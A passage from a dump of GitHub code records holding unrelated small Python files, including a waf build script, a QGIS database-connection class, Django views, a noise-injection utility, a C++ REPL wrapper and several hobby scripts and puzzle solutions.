for the better outcome\n w = [learner['w0'],learner['w1']]\n rs = [task['RA'],task['RB']]\n Qb = Qbar(w,learner['gamma'],task['delay'],rs)\n #Compute probability of choice\n preds[li] = choice(Qb,0,learner['beta'])\n if minfun == 'rmsd':\n out = np.sqrt(np.mean((preds-np.array(data))**2))\n elif minfun == 'negll': \n out = sum(utl.binoNegLL(preds,data['count_inform'],data['count_total']))\n elif minfun == None:\n out = None\n if not returnPreds:\n return(out)\n else:\n return(out,preds)\n","repo_name":"shixianliew/infoseekDelayDist","sub_path":"model_kernels/ape.py","file_name":"ape.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32609760311","text":"#! /usr/bin/env python\n# encoding: utf-8\n\nimport ibexutils\nimport shutil, os\nfrom waflib import TaskGen\n\ndef configure (conf):\n\t# Add all subdirectories of the 'src' directory in srcnode and bldnode in the\n\t# includes\n\tsubdir = ibexutils.get_dirlist (conf.path)\n\tsnode = conf.srcnode.make_node (\"src\")\n\tbnode = conf.bldnode.make_node (\"src\")\n\tfor p in subdir:\n\t\tconf.env.append_unique (\"INCLUDES_IBEX\", snode.make_node(p).abspath())\n\t\tconf.env.append_unique (\"INCLUDES_IBEX\", bnode.make_node(p).abspath())\n\n\t# Set env variable containing the list of all ibex source files (by looking\n\t# recursively for all files ending with '.cpp' or '.yc' o '.l')\n\tibex_src = conf.path.ant_glob (\"**/*.(cpp|yc|l) **/*.(cpp|yc|l).in\",\n\t excl = \"bin/**\")\n\tibex_src =[ f.path_from (conf.path) for f in ibex_src ]\n\tconf.env.append_unique ('IBEX_SRC', ibex_src)\n\n\t# Set env variable containing the list of all ibex headers (by looking\n\t# recursively for all files starting with 'ibex_' and ending with '.h' or with\n\t# '.h.in')\n\tibex_hdr = conf.path.ant_glob (\"**/ibex_*.h **/ibex_*.h.in\",\n\t excl = \"ibex_Setting.h.in\")\n\tibex_hdr =[ f.path_from (conf.path) for f in ibex_hdr ]\n\tconf.env.append_unique ('IBEX_HDR', ibex_hdr)\n\n\t# To fix Windows compilation problem (strdup with std=c++11, see issue #287)\n\tconf.check_cxx (cxxflags=\"-U__STRICT_ANSI__\", uselib_store=\"IBEX\")\n\n # Handle operators\n\tconf.recurse (\"operators\")\n\ndef build (bld):\n\t# Do substitution in files ending with .in\n\tfor f in bld.env.IBEX_SRC + bld.env.IBEX_HDR:\n\t\tif f.endswith(\".in\"):\n\t\t\tfnode = bld.path.find_node (f)\n\t\t\tt = fnode.change_ext (\"\", \".in\"),\n\t\t\ttsk = bld (features = \"subst\", source = fnode, target = t)\n\n\t# c++ compilation of main lib\n\ttg_ibex = (bld.shlib if bld.env.ENABLE_SHARED else bld.stlib) (\n\t\ttarget = \"ibex\",\n\t\tuse = [ \"IBEX\", \"ITV_LIB\", \"LP_LIB\" ] + bld.env.IBEX_PLUGIN_USE_LIST,\n\t\tsource = [ f[:-3] if f.endswith(\".in\") else f for f in bld.env.IBEX_SRC ],\n\t\tinstall_path = bld.env.LIBDIR,\n\t)\n\n\t# install headers\n\tibex_hdr = [ f[:-3] if f.endswith(\".in\") else f for f in bld.env.IBEX_HDR ]\n\tbld.install_files (bld.env.INCDIR_HDR, ibex_hdr)\n\n # build ibexsolve\n\tbld.program (\n\t\ttarget = \"ibexsolve\",\n\t\tuse = [ \"ibex\" ],\n\t\tsource = bld.path.ant_glob (\"bin/ibexsolve.cpp\"),\n\t\tinstall_path = bld.env.BINDIR,\n\t\t)\n\n # build ibexopt\n\tbld.program (\n\t\ttarget = \"ibexopt\",\n\t\tuse = [ \"ibex\" ],\n\t\tsource = bld.path.ant_glob (\"bin/ibexopt.cpp\"),\n\t\tinstall_path = bld.env.BINDIR,\n\t\t)\n","repo_name":"ibex-team/ibex-lib","sub_path":"src/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"53"} +{"seq_id":"19702134251","text":"import re\ndef get_jet_eff_color(sample):\n custom_colors = [\n ('Sherpa.*LeptHad', 'red'),\n ('Sherpa.*Wjets', 'blue'),\n ('Sherpa.*Zjets', 'black'),\n ('McAt', 'purple'),\n ('Powheg', 'green'),\n ]\n for sample_re, color in custom_colors:\n if re.compile(sample_re).search(sample):\n return color\n","repo_name":"dguest/susy-analysis","sub_path":"python/scharm/performance/style.py","file_name":"style.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24831958907","text":"from builtins import str\nfrom builtins import object\n\nfrom qgis.PyQt.QtCore import QSettings\nfrom qgis.core import *\nfrom .db_connection_cfg import DbConnectionCfg\nimport time\nimport socket\n\n\nclass DbConnections(object):\n\n def __init__(self):\n self._dbs = {} # Map\n self._dbs_refreshed = False\n\n def add_from_json(self, db):\n self._dbs[db['name']] = DbConnectionCfg(\n db['host'], db['port'], db['name'], db['username'], db['password'])\n\n def count(self):\n return len(self._dbs)\n\n def iteritems(self):\n return iter(list(self._dbs.items()))\n\n def db(self, dbname):\n return self._dbs[str(dbname)]\n \n \n def db_size(self):\n usedSpace = 0\n self.numDbs = len(list(self._dbs.keys()))\n for db in list(self._dbs.keys()):\n try:\n conn = self.db(db).psycopg_connection()\n except:\n continue\n cursor = conn.cursor()\n sql = \"SELECT pg_database_size('\" + str(db) + \"')\"\n cursor.execute(sql)\n usedSpace += int(cursor.fetchone()[0])\n cursor.close()\n conn.close\n\n # Used space in MB\n usedSpace /= 1024 * 1024\n return usedSpace\n\n def refreshed(self):\n return self._dbs_refreshed\n \n def refresh(self, user):\n cloud_connections_key = u\"/qgiscloud/connections/%s\" % user\n settings = QSettings()\n\n cloud_dbs_from_server = list(self._dbs.keys())\n stored_connections = settings.value(cloud_connections_key) or []\n cloud_dbs_from_settings = [str(conn) for conn in stored_connections]\n\n # remove obsolete connections\n for db_name in (set(cloud_dbs_from_settings) - set(cloud_dbs_from_server)):\n for connection in DbConnectionCfg.get_cloud_db_connections(db_name):\n DbConnectionCfg.remove_connection(connection)\n\n # add missing or changed connections\n for db_name in cloud_dbs_from_server:\n cfg = self.db(db_name)\n if len(DbConnectionCfg.get_cloud_db_connections(db_name)) == 0 or \\\n cfg.changed:\n cfg.store_connection()\n\n # store cloud db names in settings\n if len(cloud_dbs_from_server) > 0:\n settings.setValue(cloud_connections_key, cloud_dbs_from_server)\n else:\n settings.remove(cloud_connections_key)\n\n self._dbs_refreshed = True\n\n def cloud_layer_uri(self, db_name, table_name, geom_column):\n uri = None\n # find db connection and create uri\n connections = DbConnectionCfg.get_cloud_db_connections(db_name)\n if len(connections) > 0:\n conn = DbConnectionCfg.from_settings(connections[0])\n uri = conn.data_source_uri()\n uri.setDataSource(\"\", table_name, geom_column)\n return uri\n\n def isPortOpen(self, db_name):\n uri = self.cloud_layer_uri(db_name, \"\", \"\")\n if not uri.port():\n return False\n host = str(uri.host())\n port = int(uri.port())\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n s.connect((host, port))\n s.shutdown(2)\n return True\n except:\n return False\n\n # Wait until cloud database is available (creation is asynchronous)\n @staticmethod\n def wait_for_db(db, timeout=3, retries=5, sleeptime=3):\n ok = False\n while not ok and retries > 0:\n try:\n connection = db.psycopg_connection(timeout)\n connection.close()\n ok = True\n except Exception: # as err:\n retries -= 1\n if retries == 0:\n raise\n else:\n time.sleep(sleeptime)\n","repo_name":"tkdnsk0070/qgis-cloud-plugin","sub_path":"qgiscloud/db_connections.py","file_name":"db_connections.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"34274504509","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth.models import auth\nfrom .forms import LoginForm\nfrom .models import Student,Subject,Mark\nfrom django.db.models import Count,Sum,Avg,Max\n\n\ndef home(request):\n \n return render(request,'home.html')\n\n\ndef login_view(request):\n\n if request.method == 'POST':\n print(request)\n username = request.POST['username']\n password = request.POST['password']\n \n user = auth.authenticate(username=username,password=password)\n \n if user is not None:\n auth.login(request,user)\n \n return redirect('/home/')\n else: \n messages.info(request,'invalid credentials')\n \n return redirect('login')\n \n else:\n form = LoginForm()\n return render(request,'login.html',{\"form\":form})\n\n\ndef logout_view(request):\n auth.logout(request)\n return render(request,'logout.html')\n\n\ndef result_view(request):\n \n user = request.user.is_authenticated\n \n if user :\n a = str(request.user)\n student = Student.objects.get(student_id=a)\n mark = Mark.objects.filter(student_id=student) \n total = Mark.objects.filter(student_id=student).aggregate(Avg('marks'))\n \n context ={\n \"student\":student,\n \"mark\":mark,\n \"total\": total, \n } \n return render(request,'result.html',context)\n \n \n form = LoginForm() \n return render(request,'login.html',{\"form\":form})\n\ndef topper_view(request):\n \n user = request.user.is_authenticated\n \n if user:\n student = Student.objects.all()\n lis=[]\n for stu in student:\n mark = Mark.objects.filter(student_id=stu).aggregate(Avg('marks'))\n a = (mark['marks__avg'],stu)\n lis.append(a)\n lis.sort(reverse=True)\n topper = lis[0][1]\n aggregate = lis[0][0]\n topper_mark = Mark.objects.filter(student_id=topper)\n \n \n context ={\n \"student\":topper,\n \"topper\" : topper_mark,\n \"aggregate\" : aggregate \n }\n \n return render(request,'topper_page.html',context)\n \n \n form = LoginForm() \n return render(request,'login.html',{\"form\":form}) \n \n\n\n\n\n ","repo_name":"yashrajvanshi/RegWeb","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3375327303","text":"\"\"\"The main script for training or evaluating kg embedding models.\"\"\"\n\nfrom link_prediction import run_train, run_test\nfrom constants import BASE_CONFIG, MODELS\nfrom torch import cuda, manual_seed, device as torch_device\nfrom numpy.random import seed\nimport time\n\n# Parameters\nSEED = False # use fixed seed (0) for numpy and torch random modules\nTRAIN_MODEL = False # train a new model or load a trained model\nSAVE_RESULTS = False # save trained model and/or model evaluation\nALIGN_MODE = True # use aligned datasets or pre-trained embeddings like DBP15k\n\n# Variables required for training\ndataset = \"en_fr0\" # dataset name or id\nalign_data_train = 1 # 0 for DBP15k, 1 for WK3l-15k (only for align mode)\nmodel_type_train = 0 # 0 for TransE, 1 for RotatE (only for align mode)\n\n# Variables required for testing\nmodel_name = \"fr_en0\" # name of the model or the embeddings that is loaded, also used to load the corresponding data\nalign_data_test = 0 # 0 for DBP15k, 1 for WK3l-15k (only for align mode)\nmodel_type_test = 1 # 0 for TransE, 1 for RotatE (only for align mode)\n\n# this dictionary contains the basic parameters for training the model\ncustom_config = dict(\n dim=1000,\n margin=10,\n batch_size=1000,\n learning_rate=0.2,\n num_epochs=200,\n corruption_factor=5,\n filter_validation_triples=False,\n early_stopping=True,\n device=\"cuda:1\"\n)\nconfig = BASE_CONFIG.copy()\nconfig.update(custom_config)\nconfig['model'] = list(MODELS)[model_type_train]\n\nif cuda.is_available() and config['device'] != \"cpu\":\n device = torch_device(config['device'])\nelse:\n config['device'] = \"cpu\"\n device = torch_device(\"cpu\")\nprint(\"Using {}\".format(config['device']))\n\nif SEED:\n manual_seed(0) # pytorch seed\n seed(0) # numpy seed\n\nif TRAIN_MODEL:\n start = time.time()\n run_train(config=config, device=device, dataset=dataset, align_dataset=align_data_train, save_results=SAVE_RESULTS,\n align_mode=ALIGN_MODE, plot=False)\n print(\"Training took {} seconds.\".format(time.time() - start))\nelse:\n run_test(device=device, model_name=model_name, model_type=model_type_test, align_dataset=align_data_test,\n save_results=SAVE_RESULTS, align_mode=ALIGN_MODE)\n","repo_name":"jusch25/mt_kg-fusion","sub_path":"src/kg_embedding/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22599756627","text":"from gtts import gTTS\nimport os\nfrom playsound import playsound\n\n\nvoice=input(\"Enter text to speak:\\n\")\ngTTS(text=voice).save('speak.mp3')\nplaysound('speak.mp3')\nif os.path('speak.mp3'):\n os.remove('speak.mp3')\nelse:\n print('File Does Not Exist')\n","repo_name":"neozvbambah/textToSpeechPy","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1033728039","text":"'''\nGiven an array of bird sightings where every element represents a bird type id, determine the id of the most frequently sighted type. \nIf more than 1 type has been spotted that maximum amount, return the smallest of their ids.\nExample:\narr = [1,1,2,2,3]\n'''\narr = [-1, 2, 3, 4, 4, 6, 6, -1, -1, 2]\ndi = {}\nfor x in arr:\n if x in di.keys():\n di[x]+=1\n else:\n di[x]=1\nvalues = list(di.values())\nmax_value = max(values) \nres = []\nfor key in di.keys():\n if di[key] == max_value:\n res.append(key)\nprint(min(res))\n","repo_name":"nidhisha-shetty/Python-programs","sub_path":"birds.py","file_name":"birds.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7511479315","text":"#!/usr/bin/env python\n\nimport csv\nimport datetime\n# System\nimport glob\nimport os\nfrom xlsxwriter.workbook import Workbook\n\ndef csv_to_xlsx():\n path_directory = \"./Data/PerkembanganKasus/Indonesia/\"\n\n workbook = Workbook(\"Indonesia-Covid\" + \".xlsx\")\n\n for csvfile in glob.glob( os.path.join(path_directory, \"*.csv\") ):\n province_string = csvfile[ len(path_directory) + 1 : -4 ]\n \n worksheet = workbook.add_worksheet(province_string)\n \n cell_date_format = workbook.add_format({'num_format': 'dd mmmm yyyy'})\n cell_numeric_format = workbook.add_format({'num_format': '#,##0'})\n cell_header_format = workbook.add_format({ 'bold': True, 'locked': True, 'bg_color': 'green', 'shrink': True})\n\n with open(csvfile, \"rt\", encoding=\"utf8\") as f:\n reader = csv.reader(f)\n\n for r, row in enumerate(reader):\n for c, col in enumerate(row): \n value = col\n # Header\n if r == 0: \n worksheet.write_string(r, c, value, cell_header_format)\n # Tanggal\n elif c == 0 and r != 0:\n worksheet.write_string(r, c, value, cell_date_format)\n \n else: \n new_value = int(value)\n worksheet.write_number(r, c, new_value, cell_numeric_format)\n \n workbook.worksheets_objs.sort(key=lambda x: x.name)\n workbook.close()\n\nif __name__ == \"__main__\": \n csv_to_xlsx()\n","repo_name":"jasoneliann/bangkitindonesiaku-covid19","sub_path":"csv_to_xslx.py","file_name":"csv_to_xslx.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44338900055","text":"import requests\n\nfrom app import app\nfrom tests.test_e2e_base import TestE2eBase, URL\n\n\nclass TestE2eDisplayCheatsheets(TestE2eBase):\n def test_empty_get(self):\n response = requests.get(URL.INDEX.value)\n self._compare_num_cheatsheets(response, 0)\n # test that where there are 0 cheatsheets,\n # we don't accidentally display the error msg\n assert app.GET_CHEATSHEETS_ERR_MSG not in response.text\n\n def test_get_one_cheatsheet(self):\n self._add_cheatsheet_to_db(\"test_snippet_1\", \"test_section_1\")\n response = requests.get(URL.INDEX.value)\n self._compare_num_cheatsheets(response, 1)\n\n def test_get_two_cheatsheet(self):\n self._add_cheatsheet_to_db(\"test_snippet_1\", \"test_section_1\")\n self._add_cheatsheet_to_db(\"test_snippet_2\", \"test_section_2\")\n response = requests.get(URL.INDEX.value)\n self._compare_num_cheatsheets(response, 2)\n\n def test_get_internal_err(self):\n # delete the db in order to get an internal error.\n self._delete_db()\n\n response = requests.get(URL.INDEX.value)\n self._compare_num_cheatsheets(response, 0, db_avail=False)\n assert response.text.count(app.GET_CHEATSHEETS_ERR_MSG) == 1\n\n def test_markdown_inline_code(self):\n \"\"\"Test that an inline code is properly highlighted.\"\"\"\n self._add_cheatsheet_to_db(\"test_`snippet`_1\", \"test_section_1\")\n response = requests.get(URL.INDEX.value)\n self._compare_num_cheatsheets(response, 1)\n assert \"background-color:LightGray;\" in response.text\n\n # pylint: disable=R0201 (no-self-use)\n def test_preview_section_exists(self):\n response = requests.get(URL.INDEX.value)\n assert \"Preview\" in response.text\n","repo_name":"eranfrie/CheatSheet","sub_path":"src/tests/test_e2e_display_cheatsheets.py","file_name":"test_e2e_display_cheatsheets.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39409561246","text":"#!/usr/bin/env python3\nimport os\nimport readline\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\n\nfrom autocompleter import AutoCompleter\nimport parser\n\ncompleter = AutoCompleter()\nreadline.set_completer(completer.complete)\nreadline.read_init_file('linereader.rc')\ndefault_dir = os.path.join(tempfile.gettempdir(), 'interc')\no_start = 0\n\nSRC = 'a.cc'\nCXX = 'clang++'\nCXXFLAGS = '-std=c++11 -O2'\nBIN = 'a.out'\n\n\nheaders = set([\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include ',\n '#include \"prettyprint.hpp\"'\n])\n\nfuncs = []\n\nmain_begin = '''\nusing namespace std;\n\nint main()\n{\n'''\n\nmain_body = []\n\nmain_close = '''\n return 0;\n}\n'''\n\n\ndef s_type(tokens):\n if not tokens:\n return '' # No code\n elif tokens[0] == '#':\n return '#INC' # #include directive\n else:\n return 'CODE' # code in main body\n\n\ndef is_brace_balance(snippet):\n c1 = sum([line.count('{') for line in snippet])\n c2 = sum([line.count('}') for line in snippet])\n return c1 == c2\n\n\ndef dump(fn, t, snippet):\n '''Dump the current source code to file `filename`.\n '''\n with open(fn, 'w') as f:\n f.write('\\n'.join(headers))\n if t == '#INC':\n f.write('\\n ')\n f.write('\\n '.join(snippet))\n f.write('\\n'.join(funcs))\n f.write(main_begin)\n f.write(' ')\n f.write('\\n '.join(main_body))\n if t == 'CODE':\n f.write('\\n ')\n f.write('\\n '.join(snippet))\n f.write(main_close)\n\n\ndef interpret(fn):\n try:\n subprocess.check_output([CXX] + CXXFLAGS.split() + ['-o', BIN, fn],\n stderr=subprocess.STDOUT)\n result = subprocess.check_output(['./' + BIN],\n stderr=subprocess.STDOUT)\n return result.decode('utf-8')\n except subprocess.CalledProcessError as e:\n # print(e.args)\n print(e.output.decode('utf-8') or e, file=sys.stderr)\n return None\n\n\ndef ic_read():\n '''Read function of REPL. Returns a code snippet.\n '''\n prompts = ('>>> ', '... ')\n imbalance = 0\n snippet = []\n while True:\n try:\n line = input(prompts[imbalance > 0])\n except (EOFError, KeyboardInterrupt):\n line = None\n\n if line is None:\n yield None\n snippet = []\n elif line.strip(): # Non-empty snippet\n snippet.append(line)\n imbalance = not is_brace_balance(snippet)\n if not imbalance:\n yield snippet\n snippet = []\n\n\ndef ic_eval(snippet):\n '''Eval function of REPL. Return code snippet excution output.\n '''\n global o_start\n tokens = parser.tokenize(''.join(snippet))\n t = s_type(tokens)\n if not t:\n return ''\n\n dump(SRC, t, snippet)\n output = interpret(SRC)\n if output is None:\n return None\n else:\n completer.learn(tokens)\n if t == '#INC':\n list(map(lambda x: headers.add(x.strip()), snippet))\n else:\n main_body.extend(snippet)\n i = o_start\n o_start = len(output)\n return output[i:]\n\n\ndef ic_print(output):\n if output is not None:\n print(output)\n\n\ndef main():\n reader = ic_read()\n while True:\n snippet = next(reader)\n if snippet is None:\n break\n output = ic_eval(snippet)\n ic_print(output)\n\n\nif __name__ == '__main__':\n os.makedirs(default_dir, exist_ok=True)\n shutil.copy('prettyprint.hpp', default_dir)\n os.chdir(default_dir)\n main()\n","repo_name":"Tiensbakung/interc","sub_path":"src/interc.py","file_name":"interc.py","file_ext":"py","file_size_in_byte":4254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73610322087","text":"import numpy as np\nimport pandas as pd\nfrom easy_deco.progress_bar import ProgressBar\nfrom rackio_AI.utils.utils_core import Utils\nfrom easy_deco.del_temp_attr import set_to_methods, del_temp_attr\n\n\nclass Noise:\n \"\"\"\n Encapsulates method to work with noise\n \"\"\"\n _instances = list()\n\n def __init__(self):\n\n Noise._instances.append(self)\n\n def add(\n self, \n df: pd.DataFrame,\n win_size: int=30,\n method: str=\"rhinehardt\",\n cols: list=None,\n std_factor: float=0.001\n )-> pd.DataFrame:\n \"\"\"\n Add gaussian noise over subsequence windows based on some method\n\n **Parameters**\n\n * **:param df:** (pandas.DataFrame)\n * **:param win_size:** (int) window size to apply gaussian noise\n * **:param method:** (str) method to base gaussian noise\n * *rhinehardt* or *rh*\n * **:param cols:** (list) column names to add gaussian noise.\n\n **returns**\n\n * **df** (pandas.DataFrame) noise added\n\n ______\n ### **Snippet code\n\n ```python\n >>> import matplotlib.pyplot as plt\n >>> from rackio_AI import Noise \n >>> df = pd.DataFrame(np.random.randn(100,2), columns=[\"a\", \"b\"])\n >>> noise = Noise()\n >>> df_noisy = noise.add(df, win_size=10)\n >>> ax = plt.plot(df.index, df[\"a\"], '-r', df.index, df[\"b\"], '-b', df_noisy.index, df_noisy[\"a\"], '--r', df_noisy.index, df_noisy[\"b\"], '--b')\n >>> ax = plt.legend([\"a\", \"b\", \"noisy a\", \"noisy b\"])\n >>> plt.show()\n\n ```\n ![Add rhinehardt noise](../img/rhinehardt_noise.png)\n \"\"\"\n options = {\n 'win_size': win_size,\n 'method': method,\n 'std_factor': std_factor\n }\n self._df_ = df.copy()\n if not cols:\n\n cols = Utils.get_column_names(self._df_)\n\n self.__first_step_add(cols, **options)\n\n df = self._df_\n\n return df\n\n @ProgressBar(desc=\"Adding gaussian noise...\", unit=\"columns\")\n def __first_step_add(self, col, **kwargs):\n \"\"\"\n Decorated function to visualize the progress bar during the execution of *add noise* method\n\n **Parameters**\n\n * **:param column_name:** (list)\n\n **returns**\n\n None\n \"\"\"\n win_size = kwargs['win_size']\n windows_number = self._df_.shape[0] // win_size + 1\n windows = np.array_split(self._df_.loc[:, col], windows_number, axis=0)\n self._noise_ = list()\n\n self.__last_step_add(windows, **kwargs)\n\n self._df_.loc[:, col] = self._noise_\n\n return\n\n @ProgressBar(desc=\"Adding gaussian noise...\", unit=\"windows\")\n def __last_step_add(self, window, **kwargs):\n \"\"\"\n Decorated function to visualize the progress bar during the execution of *add noise* method\n\n **Parameters**\n\n * **:param column_name:** (list)\n\n **returns**\n\n None\n \"\"\"\n method = kwargs['method']\n\n if method.lower() in [\"rhinehardt\", \"rh\"]:\n std_factor = kwargs['std_factor']\n self._noise_.extend(self.rhinehardt(window, std_factor=std_factor))\n\n return\n\n def rhinehardt(self, x: pd.DataFrame, std_factor: float=1)->np.ndarray:\n \"\"\"\n Add noise to variable x based on Box-Muller transform\n\n **Parameters**\n\n * **:param x:** (pandas.DataFrame)\n \"\"\"\n x = x.values\n x = x.flatten()\n rng = np.random.RandomState(seed=42)\n r1, r2 = rng.uniform(size=len(x)), rng.uniform(size=len(x))\n xmean = np.mean(x)\n s = np.sqrt(np.sum((xmean - x)**2) / (len(x) - 1))\n\n if s <= 1:\n\n s = std_factor * xmean\n\n d = s * np.sqrt(-2 * np.log(r1)) * np.sin(2 * np.pi * r2)\n\n return x + d\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n","repo_name":"crivero7/RackioAI","sub_path":"rackio_AI/data_analysis/noise.py","file_name":"noise.py","file_ext":"py","file_size_in_byte":3891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41067827883","text":"from random import randint\n \nprint(\"==============================================\")\nprint(\"Let's play Janken!\")\nprint(\"==============================================\\n\\n\")\n\nstartGame = input(\"Shall we start?(y/n)\\n\")\nusername = input(\"Enter Your Username: \")\n\nwhile startGame == \"y\":\n\t\n #list of play options\n playList = [\"Rock\", \"Paper\", \"Scissors\"]\n \n #random play to the computer\n computer = playList[randint(0,2)]\n \n\n game = int(input(\"How many game would you play?: \"))\n\n count = 0\n\n win_score = 0\n tie_score = 0\n lose_score = 0\n \n while (count < game):\n\n computer = playList[randint(0,2)]\n\n count += 1\n\n player = input(\"\\nRock, Paper, Scissors?\\n\")\n if player == computer:\n print(\"Tie! \\n\")\n tie_score += 1\n elif player == \"Rock\":\n if computer == \"Paper\":\n print(username + \" lose!\", computer, \"covers\", player, \"\\n\")\n lose_score += 1\n else:\n print(username + \" win!\", player, \"smashes\", computer, \"\\n\")\n win_score += 1\n elif player == \"Paper\":\n if computer == \"Scissors\":\n print(username + \" lose!\", computer, \"cut\", player, \"\\n\")\n lose_score += 1\n else:\n print(username + \" win!\", player, \"covers\", computer,\"\\n\")\n win_score += 1\n elif player == \"Scissors\":\n if computer == \"Rock\":\n print(username + \" lose...\", computer, \"smashes\", player,\"\\n\")\n lose_score += 1\n else:\n print(username + \" win!\", player, \"cut\", computer, \"\\n\")\n win_score += 1\n else:\n print(\"That's not a valid play. Check your spelling!\\n\")\n \n print(\"\\nYour Score: \", win_score ,\" win(s) \" , tie_score ,\" tie(s) \" , lose_score ,\" lose(s)\\n\")\n\n\nif startGame == \"n\":\n print(\"Come again later\")","repo_name":"freakxelz/Rock--Paper--Scissor","sub_path":"janken.py","file_name":"janken.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15648196645","text":"from collections import defaultdict\n\n\ndef safe_ingredients_occurence(contains, all_ingredients):\n ingredients_with_allergens = []\n for ingredient in contains.values():\n [ingredient] = ingredient\n ingredients_with_allergens.append(ingredient)\n\n ingredients_without_allergen = [\n ingredient for ingredient in set(all_ingredients)\n if ingredient not in ingredients_with_allergens\n ]\n count = 0\n for ingredient in ingredients_without_allergen:\n count += len(\n [occurence for occurence in all_ingredients if occurence == ingredient]\n )\n return count\n\n\ndef dangerous_ingredients_list(contains):\n sorted_allergens = list(contains.keys())\n sorted_allergens.sort()\n dangerous_ingredients_list = ''\n for allergen in sorted_allergens:\n [ingredient] = contains[allergen]\n dangerous_ingredients_list += f'{ingredient},'\n return dangerous_ingredients_list[:-1]\n\n\ndef parse_ingredients_and_allergens(lines):\n contains = defaultdict(list)\n all_ingredients = []\n\n for line in lines:\n (ingredients, allergens) = line.split(' (contains ')\n ingredients = ingredients.split(' ')\n allergens = allergens[:-1].split(', ')\n\n [all_ingredients.append(ingredient) for ingredient in ingredients]\n for allergen in allergens:\n if not contains[allergen]:\n [contains[allergen].append(ingredient)\n for ingredient in ingredients]\n else:\n contains[allergen] = [ingredient for ingredient in ingredients\n if ingredient in contains[allergen]]\n if len(contains[allergen]) == 1:\n for a, i in contains.items():\n if a != allergen:\n while contains[allergen][0] in i:\n i.remove(contains[allergen][0])\n return contains, all_ingredients\n\n\nwith open('day21/input.data') as input:\n lines = [line for line in input.read().split('\\n')]\n\ncontains, all_ingredients = parse_ingredients_and_allergens(lines)\ncount = safe_ingredients_occurence(contains, all_ingredients)\nprint(f'first solution: {count}')\nprint(f'second solution: {dangerous_ingredients_list(contains)}')\n","repo_name":"DanielElisenberg/aoc2020","sub_path":"day21/day21.py","file_name":"day21.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22710431297","text":"#! /usr/bin/env python3\n\nimport os\nimport requests\n\nfeedbackDir = '/data/feedback'\nfeedbackDic = {}\nurl = \"http://HOSTNAME/feedback/\"\n\ndef run():\n dirs = os.listdir(feedbackDir)\n\n for file in dirs:\n with open(os.path.join(feedbackDir, file)) as feedback:\n lines = feedback.read().splitlines()\n feedbackDic['title'] = lines[0]\n feedbackDic['name'] = lines[1]\n feedbackDic['date'] = lines[2]\n feedbackDic['feedback'] = lines[3]\n\n req = requests.post(url, data=feedbackDir)\n req.raise_for_status()\n print(str(req.ok))\n\nif __name__ == \"__main__\":\n run()","repo_name":"NullReality/python-feedback-requests-google","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38994620615","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 4 18:44:22 2019\n\n@author: Joule\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom time import sleep\n\n\"\"\"Open file with training data\"\"\"\ntrain_data = pd.read_csv(\"train.csv\")\nlabels = train_data[\"label\"]\n\n\n\"\"\"Convert dataframe to list so that i can visualize with pyplotlib\"\"\"\npictures_array = []\nlabels = []\nnum_of_pic_shown = 15\nfor num_picture in range(num_of_pic_shown):\n picture = train_data.loc[num_picture].values.tolist()\n label = picture.pop(0)\n labels.append(label)\n \"\"\"make the pixel values to an 28x28 array\"\"\"\n pic_pixels = []\n pic_pixels_row = []\n for pixel_value in picture:\n pic_pixels_row.append(pixel_value)\n if len(pic_pixels_row) == 28:\n pic_pixels.append(pic_pixels_row)\n pic_pixels_row = []\n\n pictures_array.append(pic_pixels)\n\n\"\"\"Plot the drawn images\"\"\"\nfor num_of_picture in range(len(pictures_array)):\n plt.imshow(pictures_array[num_of_picture], cmap=plt.cm.binary)\n plt.show()\n print(\"This image is supposed to be\",labels[num_of_picture])\n \n\n","repo_name":"joulebit/Kaggle-Digit-Recognizer","sub_path":"digit 